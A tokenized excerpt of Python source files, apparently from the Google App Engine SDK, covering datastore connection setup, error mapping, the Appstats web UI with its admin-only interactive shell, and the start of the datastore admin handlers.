<EOL> resp = googledatastore . RollbackResponse ( ) <EOL> else : <EOL> req = transaction <EOL> resp = api_base_pb . VoidProto ( ) <EOL> return self . _make_rpc_call ( config , '<STR_LIT>' , req , resp , <EOL> get_result_hook = self . __rollback_hook , <EOL> service_name = self . _api_version ) <EOL> def __rollback_hook ( self , rpc ) : <EOL> """<STR_LIT>""" <EOL> self . check_rpc_success ( rpc ) <EOL> _DATASTORE_APP_ID_ENV = '<STR_LIT>' <EOL> _DATASTORE_PROJECT_ID_ENV = '<STR_LIT>' <EOL> _DATASTORE_ADDITIONAL_APP_IDS_ENV = '<STR_LIT>' <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV = '<STR_LIT>' <EOL> def _CreateDefaultConnection ( connection_fn , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> datastore_app_id = os . environ . get ( _DATASTORE_APP_ID_ENV , None ) <EOL> datastore_project_id = os . environ . get ( _DATASTORE_PROJECT_ID_ENV , None ) <EOL> if datastore_app_id or datastore_project_id : <EOL> app_id_override = bool ( os . environ . get ( <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , False ) ) <EOL> if not datastore_app_id and not app_id_override : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( datastore_project_id , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , <EOL> _DATASTORE_APP_ID_ENV ) ) <EOL> elif datastore_app_id : <EOL> if app_id_override : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( datastore_app_id , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV , <EOL> _DATASTORE_APP_ID_ENV , <EOL> _DATASTORE_USE_PROJECT_ID_AS_APP_ID_ENV ) ) <EOL> elif datastore_project_id : <EOL> id_resolver = datastore_pbs . IdResolver ( [ datastore_app_id ] ) <EOL> if ( datastore_project_id != <EOL> id_resolver . resolve_project_id ( datastore_app_id ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( datastore_app_id , datastore_project_id ) ) <EOL> datastore_app_id = datastore_app_id or datastore_project_id <EOL> additional_app_str = os . environ . get ( _DATASTORE_ADDITIONAL_APP_IDS_ENV , '<STR_LIT>' ) <EOL> additional_apps = ( app . strip ( ) for app in additional_app_str . split ( '<STR_LIT:U+002C>' ) ) <EOL> return _CreateCloudDatastoreConnection ( connection_fn , <EOL> datastore_app_id , <EOL> additional_apps , <EOL> kwargs ) <EOL> return connection_fn ( ** kwargs ) <EOL> def _CreateCloudDatastoreConnection ( connection_fn , <EOL> app_id , <EOL> external_app_ids , <EOL> kwargs ) : <EOL> """<STR_LIT>""" <EOL> from google . appengine . datastore import cloud_datastore_v1_remote_stub <EOL> if not datastore_pbs . _CLOUD_DATASTORE_ENABLED : <EOL> raise datastore_errors . BadArgumentError ( <EOL> datastore_pbs . MISSING_CLOUD_DATASTORE_MESSAGE ) <EOL> current_app_id = os . environ . get ( '<STR_LIT>' , None ) <EOL> if current_app_id and current_app_id != app_id : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( app_id , current_app_id ) ) <EOL> os . environ [ '<STR_LIT>' ] = app_id <EOL> id_resolver = datastore_pbs . IdResolver ( ( app_id , ) + tuple ( external_app_ids ) ) <EOL> project_id = id_resolver . resolve_project_id ( app_id ) <EOL> endpoint = googledatastore . helper . get_project_endpoint_from_env ( project_id ) <EOL> datastore = googledatastore . Datastore ( <EOL> project_endpoint = endpoint , <EOL> credentials = googledatastore . helper . get_credentials_from_env ( ) ) <EOL> kwargs [ '<STR_LIT>' ] = _CLOUD_DATASTORE_V1 <EOL> kwargs [ '<STR_LIT>' ] = id_resolver <EOL> conn = connection_fn ( ** kwargs ) <EOL> try : <EOL> stub = cloud_datastore_v1_remote_stub . CloudDatastoreV1RemoteStub ( datastore ) <EOL> apiproxy_stub_map . apiproxy . RegisterStub ( _CLOUD_DATASTORE_V1 , <EOL> stub ) <EOL> except : <EOL> pass <EOL> try : <EOL> apiproxy_stub_map . apiproxy . RegisterStub ( '<STR_LIT>' , _ThrowingStub ( ) ) <EOL> except : <EOL> pass <EOL> try : <EOL> apiproxy_stub_map . apiproxy . RegisterStub ( '<STR_LIT>' , _ThrowingStub ( ) ) <EOL> except : <EOL> pass <EOL> return conn <EOL> class _ThrowingStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def MakeSyncCall ( self , service , call , request , response ) : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( service , call ) ) <EOL> def CreateRPC ( self ) : <EOL> return apiproxy_rpc . RPC ( stub = self ) <EOL> def _ToDatastoreError ( err ) : <EOL> """<STR_LIT>""" <EOL> return _DatastoreExceptionFromErrorCodeAndDetail ( err . application_error , <EOL> err . error_detail ) <EOL> _DATASTORE_EXCEPTION_CLASSES = { <EOL> datastore_pb . Error . BAD_REQUEST : datastore_errors . BadRequestError , <EOL> datastore_pb . Error . CONCURRENT_TRANSACTION : datastore_errors . TransactionFailedError , <EOL> datastore_pb . Error . INTERNAL_ERROR : datastore_errors . InternalError , <EOL> datastore_pb . Error . NEED_INDEX : datastore_errors . NeedIndexError , <EOL> datastore_pb . Error . TIMEOUT : datastore_errors . Timeout , <EOL> datastore_pb . Error . BIGTABLE_ERROR : datastore_errors . Timeout , <EOL> datastore_pb . Error . COMMITTED_BUT_STILL_APPLYING : datastore_errors . CommittedButStillApplying , <EOL> datastore_pb . Error . CAPABILITY_DISABLED : apiproxy_errors . CapabilityDisabledError , <EOL> } <EOL> _CLOUD_DATASTORE_EXCEPTION_CLASSES = { } <EOL> if _CLOUD_DATASTORE_ENABLED : <EOL> _CLOUD_DATASTORE_EXCEPTION_CLASSES = { <EOL> googledatastore . code_pb2 . INVALID_ARGUMENT : datastore_errors . BadRequestError , <EOL> googledatastore . code_pb2 . ABORTED : datastore_errors . TransactionFailedError , <EOL> googledatastore . code_pb2 . FAILED_PRECONDITION : <EOL> datastore_errors . NeedIndexError , <EOL> googledatastore . code_pb2 . DEADLINE_EXCEEDED : datastore_errors . Timeout , <EOL> googledatastore . code_pb2 . PERMISSION_DENIED : datastore_errors . BadRequestError , <EOL> googledatastore . code_pb2 . UNAVAILABLE : apiproxy_errors . RPCFailedError , <EOL> googledatastore . code_pb2 . RESOURCE_EXHAUSTED : apiproxy_errors . OverQuotaError , <EOL> googledatastore . code_pb2 . INTERNAL : <EOL> datastore_errors . InternalError , <EOL> } <EOL> def _DatastoreExceptionFromErrorCodeAndDetail ( error , detail ) : <EOL> """<STR_LIT>""" <EOL> exception_class = _DATASTORE_EXCEPTION_CLASSES . get ( error , <EOL> datastore_errors . Error ) <EOL> if detail is None : <EOL> return exception_class ( ) <EOL> else : <EOL> return exception_class ( detail ) <EOL> def _DatastoreExceptionFromCanonicalErrorCodeAndDetail ( error , detail ) : <EOL> """<STR_LIT>""" <EOL> exception_class = _CLOUD_DATASTORE_EXCEPTION_CLASSES . get ( <EOL> error , datastore_errors . InternalError ) <EOL> if detail is None : <EOL> return exception_class ( ) <EOL> else : <EOL> return exception_class ( detail ) </s>
<s> """<STR_LIT>""" <EOL> import cgi <EOL> import cStringIO <EOL> import email . Utils <EOL> import logging <EOL> import mimetypes <EOL> import os <EOL> import re <EOL> import sys <EOL> import time <EOL> import traceback <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import admin <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . appstats import datamodel_pb <EOL> from google . appengine . ext . appstats import recording <EOL> from google . appengine . ext . webapp import _template <EOL> from google . appengine . ext . webapp import util <EOL> DEBUG = recording . config . DEBUG <EOL> def _add_billed_ops_to_map ( billed_ops_map , billed_ops_list ) : <EOL> """<STR_LIT>""" <EOL> for billed_op in billed_ops_list : <EOL> if billed_op . op ( ) not in billed_ops_map : <EOL> update_me = datamodel_pb . BilledOpProto ( ) <EOL> update_me . set_op ( billed_op . op ( ) ) <EOL> update_me . set_num_ops ( <NUM_LIT:0> ) <EOL> billed_ops_map [ billed_op . op ( ) ] = update_me <EOL> update_me = billed_ops_map [ billed_op . op ( ) ] <EOL> update_me . set_num_ops ( update_me . num_ops ( ) + billed_op . num_ops ( ) ) <EOL> def _billed_ops_to_str ( billed_ops ) : <EOL> """<STR_LIT>""" <EOL> ops_as_strs = [ ] <EOL> for op in billed_ops : <EOL> op_name = datamodel_pb . BilledOpProto . BilledOp_Name ( op . op ( ) ) <EOL> ops_as_strs . append ( '<STR_LIT>' % ( op_name , op . num_ops ( ) ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( ops_as_strs ) <EOL> def _as_percentage_of ( cost_micropennies , total_cost_micropennies ) : <EOL> """<STR_LIT>""" <EOL> if total_cost_micropennies == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return round ( ( float ( cost_micropennies ) / float ( total_cost_micropennies ) ) <EOL> * <NUM_LIT:100> , <NUM_LIT:1> ) <EOL> def render ( tmplname , data ) : <EOL> """<STR_LIT>""" <EOL> here = os . path . dirname ( __file__ ) <EOL> tmpl = os . path . join ( here , '<STR_LIT>' , tmplname ) <EOL> data [ '<STR_LIT>' ] = os . environ <EOL> data [ '<STR_LIT>' ] = recording . config . SHELL_OK <EOL> data [ '<STR_LIT>' ] = os . getenv ( '<STR_LIT>' ) <EOL> try : <EOL> return _template . render ( tmpl , data ) <EOL> except Exception , err : <EOL> logging . exception ( '<STR_LIT>' , tmpl ) <EOL> return '<STR_LIT>' % ( tmplname , err ) <EOL> class AllStatsInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , calls , cost , billed_ops ) : <EOL> self . calls = calls <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> class PathStatsInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cost , billed_ops , num_requests , most_recent_requests ) : <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> self . num_requests = num_requests <EOL> self . most_recent_requests = most_recent_requests <EOL> class PivotInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , calls , cost , billed_ops , cost_pct ) : <EOL> self . name = name <EOL> self . calls = calls <EOL> self . cost = cost <EOL> self . billed_ops = billed_ops <EOL> self . cost_pct = cost_pct <EOL> def to_list ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ self . name , self . calls , self . cost , self . billed_ops , self . cost_pct ] <EOL> @ classmethod <EOL> def from_list ( cls , values ) : <EOL> return cls ( values [ <NUM_LIT:0> ] , values [ <NUM_LIT:1> ] , values [ <NUM_LIT:2> ] , values [ <NUM_LIT:3> ] , values [ <NUM_LIT:4> ] ) <EOL> class SummaryHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . request . path . endswith ( '<STR_LIT:/>' ) : <EOL> self . redirect ( self . request . path + '<STR_LIT:/>' ) <EOL> return <EOL> summaries = recording . load_summary_protos ( ) <EOL> data = self . _get_summary_data ( summaries ) <EOL> self . response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> def _get_summary_data ( self , summaries ) : <EOL> """<STR_LIT>""" <EOL> allstats = { } <EOL> pathstats = { } <EOL> pivot_path_rpc = { } <EOL> pivot_rpc_path = { } <EOL> total_cost_micropennies = <NUM_LIT:0> <EOL> summaries = sorted ( summaries , <EOL> key = lambda x : ( - x . start_timestamp_milliseconds ( ) ) ) <EOL> for index , summary in enumerate ( summaries ) : <EOL> path_key = recording . config . extract_key ( summary ) <EOL> if path_key not in pathstats : <EOL> pathstats [ path_key ] = PathStatsInfo ( <NUM_LIT:0> , { } , <NUM_LIT:1> , [ index + <NUM_LIT:1> ] ) <EOL> else : <EOL> pathstats_info = pathstats [ path_key ] <EOL> pathstats_info . num_requests += <NUM_LIT:1> <EOL> if len ( pathstats_info . most_recent_requests ) > <NUM_LIT:10> : <EOL> if pathstats_info . most_recent_requests [ - <NUM_LIT:1> ] : <EOL> pathstats_info . most_recent_requests . append ( <NUM_LIT:0> ) <EOL> else : <EOL> pathstats_info . most_recent_requests . append ( index + <NUM_LIT:1> ) <EOL> if path_key not in pivot_path_rpc : <EOL> pivot_path_rpc [ path_key ] = { } <EOL> for x in summary . rpc_stats_list ( ) : <EOL> rpc_key = x . service_call_name ( ) <EOL> total_calls = x . total_amount_of_calls ( ) <EOL> cost_micropennies = x . total_cost_of_calls_microdollars ( ) <EOL> total_cost_micropennies += cost_micropennies <EOL> pathstats [ path_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pathstats [ path_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> if rpc_key in allstats : <EOL> allstats [ rpc_key ] . calls += total_calls <EOL> allstats [ rpc_key ] . cost += cost_micropennies <EOL> else : <EOL> allstats [ rpc_key ] = AllStatsInfo ( total_calls , cost_micropennies , { } ) <EOL> _add_billed_ops_to_map ( <EOL> allstats [ rpc_key ] . billed_ops , x . total_billed_ops_list ( ) ) <EOL> if rpc_key not in pivot_path_rpc [ path_key ] : <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] = PivotInfo ( rpc_key , <NUM_LIT:0> , <NUM_LIT:0> , { } , <NUM_LIT:0> ) <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] . calls += total_calls <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pivot_path_rpc [ path_key ] [ rpc_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> if rpc_key not in pivot_rpc_path : <EOL> pivot_rpc_path [ rpc_key ] = { } <EOL> if path_key not in pivot_rpc_path [ rpc_key ] : <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] = PivotInfo ( path_key , <NUM_LIT:0> , <NUM_LIT:0> , { } , <NUM_LIT:0> ) <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] . calls += total_calls <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pivot_rpc_path [ rpc_key ] [ path_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> allstats_by_count = [ ] <EOL> for k , v in allstats . iteritems ( ) : <EOL> for path_vals in pivot_rpc_path [ k ] . itervalues ( ) : <EOL> path_vals . billed_ops = _billed_ops_to_str ( <EOL> path_vals . billed_ops . itervalues ( ) ) <EOL> path_vals . cost_pct = _as_percentage_of ( <EOL> path_vals . cost , total_cost_micropennies ) <EOL> pivot = sorted ( pivot_rpc_path [ k ] . itervalues ( ) , <EOL> key = lambda x : ( - x . calls , x . name ) ) <EOL> allstats_by_count . append ( ( <EOL> k , v . calls , v . cost , _billed_ops_to_str ( v . billed_ops . itervalues ( ) ) , <EOL> _as_percentage_of ( v . cost , total_cost_micropennies ) , <EOL> [ x . to_list ( ) for x in pivot ] ) ) <EOL> allstats_by_count . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) ) <EOL> pathstats_by_count = [ ] <EOL> for path_key , pathstats_info in pathstats . iteritems ( ) : <EOL> rpc_count = <NUM_LIT:0> <EOL> for rpc_vals in pivot_path_rpc [ path_key ] . itervalues ( ) : <EOL> rpc_vals . billed_ops = _billed_ops_to_str ( <EOL> rpc_vals . billed_ops . itervalues ( ) ) <EOL> rpc_vals . cost_pct = _as_percentage_of ( <EOL> rpc_vals . cost , total_cost_micropennies ) <EOL> rpc_count += rpc_vals . calls <EOL> pivot = sorted ( pivot_path_rpc [ path_key ] . itervalues ( ) , <EOL> key = lambda x : ( - x . calls , x . name ) ) <EOL> pathstats_by_count . append ( ( <EOL> path_key , rpc_count , pathstats_info . cost , <EOL> _billed_ops_to_str ( pathstats_info . billed_ops . itervalues ( ) ) , <EOL> _as_percentage_of ( pathstats_info . cost , total_cost_micropennies ) , <EOL> pathstats_info . num_requests , <EOL> pathstats_info . most_recent_requests , <EOL> [ x . to_list ( ) for x in pivot ] ) ) <EOL> pathstats_by_count . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , - x [ <NUM_LIT:5> ] , x [ <NUM_LIT:0> ] ) ) <EOL> return { '<STR_LIT>' : summaries , <EOL> '<STR_LIT>' : allstats_by_count , <EOL> '<STR_LIT>' : pathstats_by_count , <EOL> } <EOL> class DetailsHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> time_key = self . request . get ( '<STR_LIT:time>' ) <EOL> timestamp = None <EOL> record = None <EOL> if time_key : <EOL> try : <EOL> timestamp = int ( time_key ) * <NUM_LIT> <EOL> except Exception : <EOL> pass <EOL> if timestamp : <EOL> record = recording . load_full_proto ( timestamp ) <EOL> render_record ( self . response , record , '<STR_LIT>' ) <EOL> def render_record ( response , record , file_url = None , extra_data = None ) : <EOL> """<STR_LIT>""" <EOL> data = { } <EOL> if extra_data is not None : <EOL> data . update ( extra_data ) <EOL> if record is None : <EOL> if extra_data is None : <EOL> response . set_status ( <NUM_LIT> ) <EOL> response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> return <EOL> data . update ( get_details_data ( record , file_url ) ) <EOL> response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> def get_details_data ( record , file_url = None ) : <EOL> """<STR_LIT>""" <EOL> rpcstats_map = { } <EOL> for rpc_stat in record . individual_stats_list ( ) : <EOL> key = rpc_stat . service_call_name ( ) <EOL> count , real , api , rpc_cost_micropennies , billed_ops = rpcstats_map . get ( <EOL> key , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , { } ) ) <EOL> count += <NUM_LIT:1> <EOL> real += rpc_stat . duration_milliseconds ( ) <EOL> api += rpc_stat . api_mcycles ( ) <EOL> rpc_cost_micropennies += rpc_stat . call_cost_microdollars ( ) <EOL> _add_billed_ops_to_map ( billed_ops , rpc_stat . billed_ops_list ( ) ) <EOL> rpcstats_map [ key ] = ( count , real , api , rpc_cost_micropennies , billed_ops ) <EOL> rpcstats_by_count = [ <EOL> ( name , count , real , recording . mcycles_to_msecs ( api ) , <EOL> rpc_cost_micropennies , _billed_ops_to_str ( billed_ops . itervalues ( ) ) ) <EOL> for name , ( count , real , api , rpc_cost_micropennies , billed_ops ) <EOL> in rpcstats_map . iteritems ( ) ] <EOL> rpcstats_by_count . sort ( key = lambda x : - x [ <NUM_LIT:1> ] ) <EOL> real_total = <NUM_LIT:0> <EOL> api_total_mcycles = <NUM_LIT:0> <EOL> for i , rpc_stat in enumerate ( record . individual_stats_list ( ) ) : <EOL> real_total += rpc_stat . duration_milliseconds ( ) <EOL> api_total_mcycles += rpc_stat . api_mcycles ( ) <EOL> api_total = recording . mcycles_to_msecs ( api_total_mcycles ) <EOL> return { '<STR_LIT>' : sys , <EOL> '<STR_LIT>' : record , <EOL> '<STR_LIT>' : rpcstats_by_count , <EOL> '<STR_LIT>' : real_total , <EOL> '<STR_LIT>' : api_total , <EOL> '<STR_LIT>' : file_url , <EOL> } <EOL> class ShellHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def _check_access ( self ) : <EOL> if recording . config . SHELL_OK : <EOL> return True <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . _check_access ( ) : <EOL> return <EOL> script = self . request . get ( '<STR_LIT>' , recording . config . DEFAULT_SCRIPT ) <EOL> extra_data = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : script , <EOL> '<STR_LIT>' : admin . get_xsrf_token ( ) , <EOL> } <EOL> render_record ( self . response , None , '<STR_LIT>' , extra_data ) <EOL> @ admin . xsrf_required <EOL> def post ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . _check_access ( ) : <EOL> return <EOL> recorder = recording . Recorder ( os . environ ) <EOL> recording . recorder_proxy . set_for_current_request ( recorder ) <EOL> script = self . request . get ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) <EOL> output , errors = self . execute_script ( script ) <EOL> recording . recorder_proxy . clear_for_current_request ( ) <EOL> recorder . record_http_status ( <NUM_LIT:0> ) <EOL> recorder . save ( ) <EOL> record = recorder . get_full_proto ( ) <EOL> extra_data = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : script , <EOL> '<STR_LIT>' : output , <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT>' : int ( recorder . start_timestamp * <NUM_LIT:1000> ) , <EOL> '<STR_LIT>' : admin . get_xsrf_token ( ) , <EOL> } <EOL> render_record ( self . response , record , '<STR_LIT>' , extra_data ) <EOL> def execute_script ( self , script ) : <EOL> save_stdout = sys . stdout <EOL> save_stderr = sys . stderr <EOL> new_stdout = cStringIO . StringIO ( ) <EOL> new_stderr = cStringIO . StringIO ( ) <EOL> try : <EOL> sys . stdout = new_stdout <EOL> sys . stderr = new_stderr <EOL> exec ( script , { } ) <EOL> except BaseException : <EOL> traceback . print_exc ( ) <EOL> finally : <EOL> sys . stdout = save_stdout <EOL> sys . stderr = save_stderr <EOL> return new_stdout . getvalue ( ) , new_stderr . getvalue ( ) <EOL> class FileHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> lineno = self . request . get ( '<STR_LIT:n>' ) <EOL> try : <EOL> lineno = int ( lineno ) <EOL> except : <EOL> lineno = <NUM_LIT:0> <EOL> filename = self . request . get ( '<STR_LIT:f>' ) or '<STR_LIT>' <EOL> orig_filename = filename <EOL> match = re . match ( '<STR_LIT>' , filename ) <EOL> if match : <EOL> index , tail = match . groups ( ) <EOL> index = int ( index ) <EOL> if index < len ( sys . path ) : <EOL> filename = sys . path [ index ] + tail <EOL> try : <EOL> fp = open ( filename ) <EOL> except IOError , err : <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> cgi . escape ( str ( err ) ) ) <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> else : <EOL> try : <EOL> data = { '<STR_LIT>' : fp , <EOL> '<STR_LIT:filename>' : filename , <EOL> '<STR_LIT>' : orig_filename , <EOL> '<STR_LIT>' : lineno , <EOL> } <EOL> self . response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> finally : <EOL> fp . close ( ) <EOL> class StaticHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> here = os . path . dirname ( __file__ ) <EOL> fn = self . request . path <EOL> i = fn . rfind ( '<STR_LIT:/>' ) <EOL> fn = fn [ i + <NUM_LIT:1> : ] <EOL> fn = os . path . join ( here , '<STR_LIT>' , fn ) <EOL> ctype , encoding = mimetypes . guess_type ( fn ) <EOL> assert ctype and '<STR_LIT:/>' in ctype , repr ( ctype ) <EOL> expiry = <NUM_LIT> <EOL> expiration = email . Utils . formatdate ( time . time ( ) + expiry , usegmt = True ) <EOL> fp = open ( fn , '<STR_LIT:rb>' ) <EOL> try : <EOL> self . response . out . write ( fp . read ( ) ) <EOL> finally : <EOL> fp . close ( ) <EOL> self . response . headers [ '<STR_LIT>' ] = ctype <EOL> self . response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT>' ] = expiration <EOL> URLMAP = [ <EOL> ( '<STR_LIT>' , DetailsHandler ) , <EOL> ( '<STR_LIT>' , ShellHandler ) , <EOL> ( '<STR_LIT>' , FileHandler ) , <EOL> ( '<STR_LIT>' , StaticHandler ) , <EOL> ( '<STR_LIT>' , SummaryHandler ) , <EOL> ] <EOL> class AuthCheckMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , application ) : <EOL> self . _application = application <EOL> def __call__ ( self , environ , start_response ) : <EOL> if not environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> if not users . is_current_user_admin ( ) : <EOL> if users . get_current_user ( ) is None : <EOL> start_response ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , <EOL> users . create_login_url ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) ) ] ) <EOL> return [ ] <EOL> else : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ '<STR_LIT>' ] <EOL> return self . _application ( environ , start_response ) <EOL> app = AuthCheckMiddleware ( webapp . WSGIApplication ( URLMAP , debug = DEBUG ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> util . run_bare_wsgi_app ( app ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import operator <EOL> import os <EOL> import time <EOL> from google . appengine . api import app_identity <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import deferred <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . datastore_admin import backup_handler <EOL> from google . appengine . ext . datastore_admin import config <EOL> from google . appengine . ext . datastore_admin import copy_handler <EOL> from google . appengine . ext . datastore_admin import delete_handler <EOL> from google . appengine . ext . datastore_admin import utils <EOL> from google . appengine . ext . db import metadata <EOL> from google . appengine . ext . db import stats <EOL> from google . appengine . ext . webapp import util <EOL> from google . appengine . runtime import apiproxy_errors <EOL> from google . appengine . runtime import features <EOL> ENTITY_ACTIONS = { <EOL> '<STR_LIT>' : copy_handler . ConfirmCopyHandler . Render , <EOL> '<STR_LIT>' : delete_handler . ConfirmDeleteHandler . Render , <EOL> '<STR_LIT>' : backup_handler . ConfirmBackupHandler . Render , <EOL> } <EOL> if features . IsEnabled ( '<STR_LIT>' ) : <EOL> del ENTITY_ACTIONS [ '<STR_LIT>' ] <EOL> BACKUP_ACTIONS = { <EOL> '<STR_LIT>' : backup_handler . ConfirmDeleteBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . ConfirmRestoreFromBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . BackupInformationHandler . Render , <EOL> } <EOL> PENDING_BACKUP_ACTIONS = { <EOL> '<STR_LIT>' : backup_handler . ConfirmAbortBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . BackupInformationHandler . Render , <EOL> } <EOL> GET_ACTIONS = ENTITY_ACTIONS . copy ( ) <EOL> GET_ACTIONS . update ( BACKUP_ACTIONS ) <EOL> GET_ACTIONS . update ( PENDING_BACKUP_ACTIONS ) <EOL> GET_ACTIONS . update ( { '<STR_LIT>' : <EOL> backup_handler . ConfirmBackupImportHandler . Render } ) <EOL> MAX_RPCS = <NUM_LIT:10> <EOL> def _GetDatastoreStats ( kinds_list , use_stats_kinds = False ) : <EOL> """<STR_LIT>""" <EOL> global_stat = stats . GlobalStat . all ( ) . fetch ( <NUM_LIT:1> ) <EOL> if not global_stat : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> global_ts = global_stat [ <NUM_LIT:0> ] . timestamp <EOL> kind_stats = stats . KindStat . all ( ) . filter ( '<STR_LIT>' , global_ts ) . fetch ( <NUM_LIT:1000> ) <EOL> if not kind_stats : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> results = { } <EOL> for kind_ent in kind_stats : <EOL> if ( not kind_ent . kind_name . startswith ( '<STR_LIT>' ) <EOL> and ( use_stats_kinds or kind_ent . kind_name in kinds_list ) <EOL> and kind_ent . count > <NUM_LIT:0> ) : <EOL> results [ kind_ent . kind_name ] = _PresentatableKindStats ( kind_ent ) <EOL> utils . CacheStats ( results . values ( ) ) <EOL> for kind_str in kinds_list or [ ] : <EOL> if kind_str not in results : <EOL> results [ kind_str ] = { '<STR_LIT>' : kind_str } <EOL> return ( global_ts , <EOL> sorted ( results . values ( ) , key = lambda x : x [ '<STR_LIT>' ] ) ) <EOL> def _KindsListToTuple ( kinds_list ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , [ { '<STR_LIT>' : kind } for kind in sorted ( kinds_list ) ] <EOL> def _PresentatableKindStats ( kind_ent ) : <EOL> """<STR_LIT>""" <EOL> count = kind_ent . count <EOL> entity_bytes = kind_ent . entity_bytes <EOL> total_bytes = kind_ent . bytes <EOL> average_bytes = entity_bytes / count <EOL> return { '<STR_LIT>' : kind_ent . kind_name , <EOL> '<STR_LIT:count>' : utils . FormatThousands ( kind_ent . count ) , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( entity_bytes ) , <EOL> '<STR_LIT>' : entity_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( total_bytes ) , <EOL> '<STR_LIT>' : total_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( average_bytes ) , <EOL> } <EOL> class RouteByActionHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def ListActions ( self , error = None ) : <EOL> """<STR_LIT>""" <EOL> use_stats_kinds = False <EOL> kinds = [ ] <EOL> more_kinds = False <EOL> try : <EOL> kinds , more_kinds = self . GetKinds ( ) <EOL> if not kinds : <EOL> use_stats_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> except datastore_errors . Error , e : <EOL> logging . exception ( e ) <EOL> use_stats_kinds = True <EOL> last_stats_update , kind_stats = _GetDatastoreStats ( <EOL> kinds , use_stats_kinds = use_stats_kinds ) <EOL> template_params = { <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : utils . GenerateHomeUrl ( 